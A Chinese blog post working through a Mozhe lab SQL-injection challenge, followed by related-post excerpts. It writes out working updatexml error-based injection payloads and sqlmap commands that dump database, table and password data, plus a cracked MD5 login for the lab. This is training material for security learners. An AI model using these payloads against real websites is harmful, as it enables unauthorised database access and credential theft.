墨者-SQL注入漏洞测试(报错盲注) 题解

最新推荐文章于 2025-07-10 19:20:53 发布
原创 最新推荐文章于 2025-07-10 19:20:53 发布 · 543 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #数据库 #mysql

本文详细讲述了在未防护的MySQL系统中,通过公告界面和报错注入技巧,逐步获取数据库敏感信息的过程,包括库名、表名、字段值等,并利用这些信息进行登录。关键步骤包括字符型注入、unionselect、updatexml函数利用和字段值解析。

靶场地址:https://www.mozhe.cn/bug/detail/Ri9CaDcwWVl3Wi81bDh3Ulp0bGhOUT09bW96aGUmozhe

依旧是mysql、无防护

①依旧是公告界面
url:http://219.153.49.228:44679/new_list.php?id=1
1',1' and '1'='1' -- q,1' and '1'='2' -- q判断存在字符型注入,数据库类型为MariaDB

②order by 判断字段数为4,union select无回显

③尝试报错注入,利用函数updatexml()
updatexml参数(目标xml内容,xml文档路径,更新的内容)
当文档路径包含字符~,会判断不合法,输出字符~报错
利用concat函数将子查询语句与字符~拼接
例如:concat(0x7e,(select user()))
会将查询结果拼接~报错输出
所以尝试

id=1' and updatexml(1,concat(0x7e,(select user())),1) -- q
在这里插入图片描述
判断存在报错注入

④接下来还是联合注入那一套,替换子查询语句即可

id=1' and updatexml(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata)),1) -- q
爆出库名information_schema,mysql,perfor

查询perfor库是空的
database()查询出当前数据库为stormgroup,居然不在schema_name里

爆出表名member,notice

表member爆出字段name,password,status

⑤分别查询字段值

id=11111111' and updatexml(1,concat(0x7e,(select group_concat(字段) from member)),1) -- q

name字段:mozhe,mozhe
status字段:0,1
查询password字段时,根据另外两个字段可知有两条数据,因为报错长度最多为32位,字符~占了1位,剩下31位不够输出第一个32位的MD5密码,而且第一条数据status字段值为0,大概率用不了。
直接查询第二条数据

id=11111111' and updatexml(1,concat(0x7e,(select group_concat(password) from member where status='1')),1) -- q
在这里插入图片描述
得到~76e59b744c5db295a5f0b66f2e9a192
依旧少了一位,利用函数substr(字符串,32,1)输出第32位字符

id=11111111' and updatexml(1,concat(0x7e,(select substr(group_concat(password),32,1) from member where status=1)),1) -- q
得到~e
拼一拼得到76e59b744c5db295a5f0b66f2e9a192e
解密得到945748
mozhe/945748登录得到key

者学院-SQL手工注入漏洞测试(MySQL数据库)
多崎巡礼的博客
07-26 3438
此题很简单,可以完全参照 https://blog.youkuaiyun.com/qq_42357070/article/details/81215715 进行解题 以下用cms站点举例: https://pan.baidu.com/s/1uiO2cqZCGquQqyYWr0C7WQ     提交and 1=1 返回内容正常        And 1=2 返回内容为空 确定存在注入漏...
者学院-SQL注入漏洞测试报错
weixin_42939822的博客
03-30 5380
者学院-SQL注入漏洞测试报错
者靶场------SQL注入漏洞测试(报错)
qq_43590351的博客
01-20 999
SQL注入漏洞测试(报错) 自己构造请求参数,然后数据库返回错误的信息,以至于我们能够爆出我们想要的信息 要进行SQL报错注入,首先要了解MySQL的几个函数 (1)concat 用来连接字符串 select concat('m','y','s','q','l')   执行结果为mysql (2)updatexml 第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc 第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法
者靶场 SQL注入漏洞测试(报错)通关思路
zyh1588的博客
11-01 807
小白回顾者靶场之sql报错注入
刷题笔记:SQL注入漏洞测试(宽字节)
m0_67399862的博客
06-05 589
刷题笔记:宽字节注入
sql(时间)——者学院——漏洞操作记录
chick11的博客
07-16 318
Sql时间 1、 开始的页面,但是不是这个页面,点击下面的任性网页 2、提示再url中传参,加个逗号 ?type=1’ 既然提示是时间,那就 ?type=1’ and sleep(5)%23 没有时间延迟 去掉单引号 有时间延迟5秒 因为是时间延迟,没有任何回显,那只能用python写脚本或者用sqlmap 这里是脚本,但是后面有错误,我找不到原因,只能查到flag、goods表的字段 import requests import datetime i
-SQL注入漏洞测试(报错)
wh1sper、的博客
07-04 942
-SQL注入漏洞测试前言一、sqlmap二、手1.报错注入2.时间注入3.联合查询union被过滤总结 前言 本题为者学院在线靶场 进入题目发现是个登录界面,找了好久,最后在关于平台停机维护的通知的页面找到了注入点 判断注入类型,当输入?id=1’ and 1=1 %23时,页面显示正常。 ?id=1' and 1=1 %23 当输入?id=1’ and 1=2 %23时,页面显示不正常。 由此判断注入类型为单字符注入。 一、sqlmap 首先先清理sqlmap的缓存。 python sq
者学院-SQL注入漏洞测试(报错)
qq_33598708的博客
04-21 2133
启动靶场正常访问: 随便输入账号和密码: 并没有发现什么可用的信息 点击查看公告: 可以看到详细的公告哈!我们看看能不能在公告上做文章。 /new_list.php?id=1 and 1=1 在我以为可以直接注入的时候,我发现1=2的时候也能正常显示哈!!! 然后在找闭合的时候,发现数据库报错的信息会显示出来。所以我们可以利用数据库报错展示出我们想要的数据。 开始注入: updatexml函数错误 updatexml('XML_document',...
者学院-SQL注入漏洞测试(布尔
qq_47094508的博客
01-23 3267
手工测试和工具测试工具(sqlmap)工具使用参考连接https://www.anquanke.com/post/id/235846首先我们拿到题目之后会得到一个登录框这时候需要去寻找他的注入点,可以通过登陆键下方的提示进去,也可以使用工具一把梭这工具是真好用(火狐小插件) 当我们来到这个注入点的页面就可以用工具一把梭 首先爆他的库名 在爆表名 列名 抓内容 抓到之后md5解密,最终得到flag 手工测试首先判断注入点是否存在 没有回显所以我们首先需要判断库名长度,通过测试最终
【CISP-PTE】SQL注入练习题
西原一点红的博客
06-26 2360
得到 flag n1book{union_select_is_so_cool}通过SQL注入漏洞读取/tmp/360/key文件,答案就在文件中。爆出有两个表 Article IS_KEY。发现回显内容被截取,结果显示不全,参考文档。sqlmap注入并执行sql-shell。题目明确提示过滤了释符 # –sqlmap执行sql shell。发现列数为6时,回显字段2。
SQL注入——基于报错注入(五)
Gjqhs的博客
02-18 1264
本章目的 普及报错功能函数extractvalue()的用法,演示基于报错SQL注入基本流程。 实验环境 攻击机:Pentest-Atk (1)操作系统:Windows10 (2)安装的应用软件:Sqlmap、Burpsuite、FireFox浏览器及其插件Hackbar、等 (3)登录账号密码:操作系统帐号Administrator,密码Sangfor!7890 想机:A-SQLi-Labs (1)操作系统:Centos7 (2)安装的应用软件:Apache、MySQL(MariaDB)、PHP:DV
sqli-labs(54-65)
qq_43395215的博客
08-26 714
文章目录第54关:第55关:第56关:第57关:第58关:第59关:第60关:第61关:第62关:第63关:第64关:第65关: 第54关: 根据这一关的提示,我们可以知道数据库的名字“chellenges”,我们需要知道“dump”的密码,才能通关,而且只有10次尝试机会 因为只有10次机会,所以判断闭合时需要猜测最常见的,所以先判断单引号、然后双引号、整形、最后括号 闭合方式: /Less-54/?id=-1' union select 1,2,3--+ 因为一直到库名,需要判断表名,意语句要一次正
实训3 day
z20201213的博客
07-10 209
SQL报错注入
原理基础
qq_58000413的博客
09-15 607
and substr((select table_name from information_schema.tables where table_schema=database()),1,1) >100 判断出表名。and if(ascii((substr(database(),1,1)))) 判断出数据库第一个字母的ascii值。and if(length(database())>12,0,sleep(4)) 判断出数据库长度。若需要闭合就手动帮闭合下。
者学院 靶场练习(一) SQL注入
a519395243的博客
12-20 8602
者学院 在线靶场 工具: sqlmap 第一题: SQL手工注入漏洞测试(MySQL数据库-字符型) 利用工具 可以很快速注入,手工注入请看 https://blog.youkuaiyun.com/qq_42357070/article/details/81215715   进来点击公告   sqlmap 用于 mysql注入的步骤: 1:查找数据库 ./sqlmap.py ...
Java基础-浙大翁恺老师-第六章笔记
kode学习笔记
09-08 700
字符 5.1 字符类型 char是单个的字符,Java使用Unicode来表示字符 Unicode–>可以用来表示汉字内的多种文字 字符可以用来做什么? 字符+数字:每个字符对应一个数字,字符的加减对应于数字的加减,然后输出计算后数字对应的字符 char c = 'A'; c++; System.out.println(c); 两个字符相减,得到在在表格中的距离(int) char e = 'A'; char f = 'D'; System.out.println(e-f); char可
- SQL注入漏洞测试(布尔)
吃肉唐僧的博客
07-01 5508
手工注入 根据浮动的通告进度条,找到sql注入点 输入/new_list.php?id=1' and 1=1,内容空白 输入/new_list.php?id=1 and 1=1,内容显示,判断这个id的值类型是数字类型 然后开始判断数据库名字的长度,/new_list.php?id=1 and length(database())=1,内容空白。一直试,试到长度为10 ...
SQL注入漏洞测试(时间)题解
zr1213159840的博客
12-12 1159
解法一:剑走偏锋 首先我们拿到网址后,第一个事就是加上type后测试下 好小子,竟然回显?那我就不客气了 直接看下数据库 爆表 type=group_concat(table_name) from information_schema.tables where table_schema=‘pentesterlab’–+ 爆表中的列,先测试下user type=group_concat(column) from information_schema.columns where table_name=‘f
报错注入的一些整理 By Assassin
Assassin
01-29 1329
mysql暴错注入方法整理,通过floor,UpdateXml,ExtractValue,NAME_CONST,Error based Double Query Injection等方法SQL注入1、通过floor暴错 /数据库版本/ http://www.waitalone.cn/sql.php?id=1+and(select 1 from(select count(*),concat((se
者靶场sql注入漏洞测试布尔
最新发布
10-24
者靶场进行 SQL 注入漏洞测试(布尔),可按以下步骤操作: 1. **环境探查与漏洞初筛**:进入靶场环境找到后台管理页面,先尝试弱口令和万能密码,若失败则抓包查看登陆处是否存在注入漏洞。若未发现,仔细查看页面寻找新链接,点击跳转后若怀疑存在注入漏洞,可构造特定 URL 进行测试,以确认是否为数字型 SQL 注入漏洞。例如构造 `http://219.153.49.228:41979/new_list.php?id=1` 查看是否有回显,再构造 `http://219.153.49.228:41979/new_list.php?id=1'` 查看是否无回显,还可构造 `http://219.153.49.228:41979/new_list.php?id=1 and 1=1` 和 `http://219.153.49.228:41979/new_list.php?id=1 and 1=2` 分别查看有无回显来判断 [^1]。 2. **手动判断数据库信息** - **判断数据库名长度**:若未找到回显位,可尝试布尔型注入。如输入 `id=1 and length(database())=1`,根据返回页面是否空白判断长度是否为 1,逐个尝试确定数据库名长度 [^4]。 - **判断数据库名**:确定长度后,输入 `id=1 and substr(database(),1,1)='a' --+`,根据返回页面情况确定数据库名的第一个字符,依此类推确定整个数据库名 [^4]。 3. **使用 sqlmap 自动化操作** - **检测注入并获取数据库信息**:使用命令 `sqlmap -u <目标 URL>` 进行注入检测。若要获取数据库列表,可使用 `python2 sqlmap.py -u <目标 URL> -technique=B --dbs` 或 `sqlmap.py -u <目标 URL> --dbs` [^1][^2][^3][^4]。 - **获取数据库中的表**:确定数据库名(如 `stormgroup`)后,使用 `python2 sqlmap.py -u <目标 URL> -technique=B -D=<数据库名> --tables` 或 `sqlmap.py -u <目标 URL> -D <数据库名> --tables` 获取表名 [^1][^2][^4]。 - **获取表中的列**:使用 `python2 sqlmap.py -u <目标 URL> -technique=B -D <数据库名> -T <表名> --columns` 或 `sqlmap.py -u <目标 URL> -D <数据库名> -T <表名> --columns` 获取列名 [^1][^2][^4]。 - **获取表中的内容**:使用 `python2 sqlmap.py -u <目标 URL> -technique=B -D <数据库名> -T <表名> -C <列名> --dump` 或 `sqlmap.py -u <目标 URL> -D <数据库名> -T <表名> -C <列名> --dump` 获取指定列的内容 [^2][^4]。 4. **后续处理**:获取到加密的密码等信息后,可找网站进行 MD5 解密,然后使用解密后的信息尝试登录,获取 key [^1][^2][^4]。 ### 示例代码 ```bash # 使用 sqlmap 检测注入并获取数据库列表 sqlmap -u http://219.153.49.228:41979/new_list.php?id=1 --dbs # 获取指定数据库中的表 sqlmap -u http://219.153.49.228:41979/new_list.php?id=1 -D stormgroup --tables # 获取指定表中的列 sqlmap -u http://219.153.49.228:41979/new_list.php?id=1 -D stormgroup -T member --columns # 获取指定列的内容 sqlmap -u http://219.153.49.228:41979/new_list.php?id=1 -D stormgroup -T member -C name,password --dump ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Redredredfish

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值